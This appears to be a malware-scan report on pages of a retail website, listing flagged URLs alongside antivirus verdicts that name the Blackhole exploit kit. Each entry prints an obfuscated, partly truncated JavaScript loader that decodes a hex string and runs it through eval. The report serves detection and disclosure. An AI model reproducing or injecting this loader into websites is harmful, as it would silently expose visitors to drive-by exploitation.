... 3599 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7a^73^7a^79^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://zakka-orbe.com/item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/aboutus.htm | 200 OK Content-Length: 45280 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7a^73^7a^79^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^
... 3599 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7a^73^7a^79^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://zakka-orbe.com/item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/../../aboutus/../item_detail/newitem/newitem.htm | 200 OK Content-Length: 208136 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^7f^7a^73^7a^79^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^
... 3599 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^7f^7a^73^7a^79^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|